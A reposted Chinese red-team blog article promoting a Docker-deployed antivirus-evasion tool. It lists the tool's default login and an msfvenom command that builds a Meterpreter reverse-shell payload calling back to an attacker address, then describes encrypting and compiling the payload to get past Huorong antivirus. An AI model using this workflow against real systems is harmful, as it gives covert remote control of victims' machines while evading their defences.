文章总结: 本文介绍了一款流水线式免杀工具,支持Docker快速部署。用户导入msfvenom生成的Payload后,可选择不同加密方式与编译环境生成免杀程序,实测成功绕过火绒。文章建议多尝试加密与编译组合以提升逃逸率,适合红队人员学习。 综合评分: 73 文章分类: 免杀,红队,安全工具
红队必备:流水线式 BypassAV 工具
原创
大表哥吆 大表哥吆
kali笔记
2026年8月4日 08:00 甘肃
在小说阅读器读本章
去阅读
本文为大家推荐一款极易上手的免杀工具。加入流程化管理,像流水线一样学习免杀。
项目地址:https://github.com/9527952777/bypassav-opensource/
注 意
免责申明:
本文仅供学习和研究,坚决反对一切危害网络安全的行为,造成法律后果自行负责。
项目部署
接下来,我们用Docker启动项目。
docker compose up -d --build
完成后访问http://localhost:5173
初始账号和密码:
admin / Admin@123456
项目首页
小试牛刀
接下来,我们用msf生成常见的Payload。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.50.120 LPORT=4444 -f raw -o payload.bin
接下来,将生成的Payload导入。
选择加密方式和编码方式
这里推荐C+
需要注意的是,在编译之前我们需要提前按照相关编译环境,注意,不是给Kali安装,而是给容器安装相关环境。
完成后,等待编译输出。
msf中配置并上线
火绒
总结
选择不同的加密方式和编译环境,对生成的程序能否逃逸有很大的影响。建议多试试不同的加密方式和编译环境。
更多精彩文章 欢迎关注我们
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:kali笔记 大表哥吆 大表哥吆《红队必备:流水线式 BypassAV 工具》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。









评论